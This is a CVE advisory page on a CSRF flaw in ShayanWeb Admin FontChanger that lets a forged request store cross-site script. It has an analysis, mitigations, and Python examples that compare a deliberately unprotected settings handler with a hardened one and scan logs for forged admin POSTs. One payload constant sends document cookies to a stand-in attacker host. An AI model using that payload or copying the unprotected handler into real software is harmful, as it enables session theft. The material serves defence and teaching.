
CVE-2025-48114: CWE-352 Cross-Site Request Forgery (CSRF) in Shayan Farhang Pazhooh ShayanWeb Admin FontChanger

Severity: High
Tags: Vulnerability, CVE-2025-48114, CWE-352
Published: Fri May 16 2025 (05/16/2025, 15:45:07 UTC)
Source: CVE
Vendor/Project: Shayan Farhang Pazhooh
Product: ShayanWeb Admin FontChanger

Description

Cross-Site Request Forgery (CSRF) vulnerability in Shayan Farhang Pazhooh ShayanWeb Admin FontChanger allows Stored XSS. This issue affects ShayanWeb Admin FontChanger: from n/a through 1.8.1.

AI-Powered Analysis

Last updated: 07/11/2025, 23:02:32 UTC

Technical Analysis

CVE-2025-48114 is a high-severity Cross-Site Request Forgery (CSRF) vulnerability, classified as CWE-352, in the ShayanWeb Admin FontChanger product by Shayan Farhang Pazhooh; it affects all versions through 1.8.1. The admin-facing settings handler does not verify that a state-changing request was deliberately submitted by the logged-in user (for example with a per-session anti-CSRF token), so a page under an attacker's control can make the victim's browser submit that request with the victim's session cookies attached. Because the value written by the request is stored and later rendered without adequate output encoding, a forged request can plant a script that is persisted server-side and executed in the browser of every user who subsequently views the affected page: a CSRF whose payload is a Stored Cross-Site Scripting (XSS). The CVSS 3.1 base score is 7.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L): the attack is reachable over the network with low complexity and the attacker needs no privileges of their own, but a privileged user has to interact, by visiting the attacker's page while authenticated. Scope is changed because the injected script executes in other users' browsers, outside the component that holds the flaw. Confidentiality, integrity and availability impacts are each rated low individually, but in practice script running inside an administrative interface can read the administrator's session and page content, issue further authenticated requests in their name, and alter site content. At the time of this analysis no exploitation in the wild had been reported and no vendor patch was recorded.
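The sequence the analysis describes, as an added illustrative example rather than the product's own code: a settings handler in the vulnerable shape (any authenticated POST is honoured and the stored value is rendered raw) beside a hardened version that rejects foreign Origins, checks a session-bound synchronizer token in constant time, and HTML-encodes on output. Class, endpoint, field and cookie names, the secret key and the payload are all assumptions.

```python
"""Added example (not ShayanWeb Admin FontChanger code): a minimal admin
"font setting" handler in the vulnerable shape the analysis describes,
beside a hardened version. Endpoint, field and cookie names are assumed."""
import hashlib
import hmac
import html


class Request:
    """Constructed stand-in for an HTTP POST. session_id plays the role of
    the session cookie that the browser attaches automatically, including
    to a form that an attacker's page auto-submits."""

    def __init__(self, form, session_id, origin=None):
        self.form = form
        self.session_id = session_id
        self.origin = origin  # value of the Origin header, None if absent


class VulnerableFontSettings:
    """Accepts any authenticated POST and renders the stored value raw."""

    def __init__(self):
        self.font = "Arial"

    def handle_post(self, request):
        # No proof that the user meant to submit this form: a page on
        # attacker.example can submit it from the admin's browser.
        self.font = request.form.get("font", self.font)
        return "saved"

    def render_page(self):
        # No output encoding: a stored "<script>" runs for every viewer.
        return f"<p>Current font: {self.font}</p>"


class HardenedFontSettings:
    """Origin check, session-bound synchronizer token, output encoding."""

    def __init__(self, secret, site_origin):
        self.secret = secret            # server-side key, never sent to clients
        self.site_origin = site_origin  # e.g. "https://www.example.org"
        self.font = "Arial"

    def issue_token(self, session_id):
        # Per-session token derived with an HMAC and embedded in the settings
        # form; a page on another origin cannot read it out of the admin's page.
        return hmac.new(self.secret, session_id.encode(), hashlib.sha256).hexdigest()

    def handle_post(self, request):
        # Browsers add Origin to cross-site form POSTs; reject foreign ones.
        if request.origin is not None and request.origin != self.site_origin:
            return "rejected: cross-site origin"
        expected = self.issue_token(request.session_id)
        supplied = request.form.get("csrf_token", "")
        if not hmac.compare_digest(expected, supplied):
            return "rejected: bad csrf token"
        self.font = request.form.get("font", self.font)
        return "saved"

    def render_page(self):
        # Encoding at output time neutralises whatever was stored.
        return f"<p>Current font: {html.escape(self.font)}</p>"


# Constructed payload of the kind a forged request would store.
PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"


def demo():
    """Sends one forged cross-site POST to both handlers and returns the outcomes."""
    forged = Request({"font": PAYLOAD}, session_id="admin-session",
                     origin="https://attacker.example")
    vuln = VulnerableFontSettings()
    hard = HardenedFontSettings(b"server-secret-key", "https://www.example.org")
    return {
        "vulnerable": vuln.handle_post(forged),
        "vulnerable_page": vuln.render_page(),
        "hardened": hard.handle_post(forged),
        "hardened_font": hard.font,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The token check is the primary control; the Origin comparison only adds defence in depth, because Origin can be absent on some requests, and output encoding is what stops the stored payload from executing if anything slips through.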

Potential Impact

For European organizations running ShayanWeb Admin FontChanger, the practical risk is that an administrator who visits an attacker-controlled page while logged in can unknowingly store script in the site's configuration. That script then runs for every user who views the affected page, enabling session hijacking, unauthorized administrative actions and disclosure of whatever data is visible in the administrative interface; the integrity of website content and, if administrative functions are abused, availability can also be affected. Organizations in government, finance, healthcare and critical infrastructure that use the product for web administration face reputational damage, GDPR exposure if personal data is leaked, and operational disruption. The attacker needs no account on the target site: the user interaction the CVSS vector requires is the victim's, so anyone who can get an administrator to open a link or load a page (a phishing email, a forum post, any site the administrator browses while logged in) is a potential attacker, which widens the exposure considerably. With no patch recorded at the time of analysis, affected organizations must rely on compensating controls until the vendor publishes a fix.

Mitigation Recommendations

1. If you maintain or can modify the application, add anti-CSRF protection to every state-changing administrative request: a per-session synchronizer token compared in constant time, or a signed double-submit cookie, plus an Origin/Referer check as defence in depth.
2. Deploy a Content Security Policy on the administrative pages that disallows inline script and restricts script sources, so a stored payload cannot execute even if it is saved.
3. Validate the stored font setting against an allow-list of expected values and HTML-encode every stored value when it is rendered; encoding at output time is what stops the stored XSS.
4. Restrict access to the administrative interface with network-level controls (VPN, IP allow-listing) to limit exposure, while noting that a CSRF request originates from the administrator's own browser and therefore passes such controls whenever the administrator does.
5. Instruct administrators not to browse untrusted sites while logged into the administrative interface and to log out when finished; a CSRF needs a live session to ride on.
6. Monitor web server logs for POST requests to the font-settings endpoint whose Referer is absent or points to a foreign host, and alert on changes to the stored font value that do not match an administrator's known activity.
7. Apply a web application firewall with CSRF and XSS rules as a temporary measure, bearing in mind that a forged request looks like a legitimate administrative request apart from its Origin/Referer and its payload.
8. Track the vendor for a fix and plan to deploy it promptly once it is available.
9. Review session management: set the session cookie with the SameSite (Lax or Strict) and Secure attributes where the application supports it, keep session lifetimes short, and rotate the session identifier on login to reduce the window for hijacking.
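The log check from recommendation 6, as an added example that is not part of the original advisory or the vendor's tooling: it parses Apache combined-format access log lines and flags POSTs to the administrative font-settings endpoint whose Referer is missing or comes from another host. The site hostname, the endpoint path and the sample log lines are constructed assumptions.

```python
"""Added example (not vendor code): flag POSTs to the admin font-settings
endpoint whose Referer is absent or from a foreign host, reading Apache
combined-format access log lines. Site host, endpoint path and the sample
lines are constructed assumptions."""
import re
from urllib.parse import urlparse

SITE_HOST = "www.example.org"            # assumed hostname of the protected site
ADMIN_PATHS = ("/admin/font-settings",)  # assumed settings endpoint

# Apache "combined" format:
# host ident user [time] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample: two legitimate admin requests, then two forged-looking ones.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/May/2025:15:45:07 +0000] "GET /admin/font-settings HTTP/1.1" '
    '200 1842 "https://www.example.org/admin/" "Mozilla/5.0"',
    '203.0.113.7 - - [16/May/2025:15:45:20 +0000] "POST /admin/font-settings HTTP/1.1" '
    '302 0 "https://www.example.org/admin/font-settings" "Mozilla/5.0"',
    '203.0.113.7 - - [16/May/2025:15:47:02 +0000] "POST /admin/font-settings HTTP/1.1" '
    '302 0 "https://attacker.example/blog/free-fonts.html" "Mozilla/5.0"',
    '198.51.100.3 - - [16/May/2025:15:48:11 +0000] "POST /admin/font-settings HTTP/1.1" '
    '302 0 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicion_reason(entry, site_host=SITE_HOST, admin_paths=ADMIN_PATHS):
    """Return why an entry looks like a CSRF attempt, or None if it does not."""
    if entry["method"] != "POST" or not entry["path"].startswith(admin_paths):
        return None
    referer = entry["referer"]
    if referer in ("", "-"):
        # Referrer-Policy can strip this legitimately, so this is the weaker signal.
        return "admin POST without Referer"
    host = urlparse(referer).hostname
    if host != site_host:
        return f"admin POST referred from foreign host {host}"
    return None


def find_suspicious(lines):
    """Return (entry, reason) pairs for lines worth alerting on."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reason = suspicion_reason(entry)
        if reason:
            hits.append((entry, reason))
    return hits


if __name__ == "__main__":
    for entry, reason in find_suspicious(SAMPLE_LOG):
        print(f'{entry["time"]} {entry["ip"]} {entry["path"]}: {reason}')
```

Referer is a heuristic: browsers send it on cross-site form submissions unless a Referrer-Policy suppresses it, so the "without Referer" case should be correlated with a change in the stored setting before it is treated as an incident. The default combined format does not record the Origin header; adding `%{Origin}i` to the LogFormat gives a stronger signal for the same check.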


Technical Details

Data Version: 5.1
Assigner Short Name: Patchstack
Date Reserved: 2025-05-15T18:01:15.809Z
CISA Enriched: true
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 682cd0f91484d88663aebd68

Added to database: 5/20/2025, 6:59:05 PM

Last enriched: 7/11/2025, 11:02:32 PM

Last updated: 7/31/2025, 12:01:16 PM

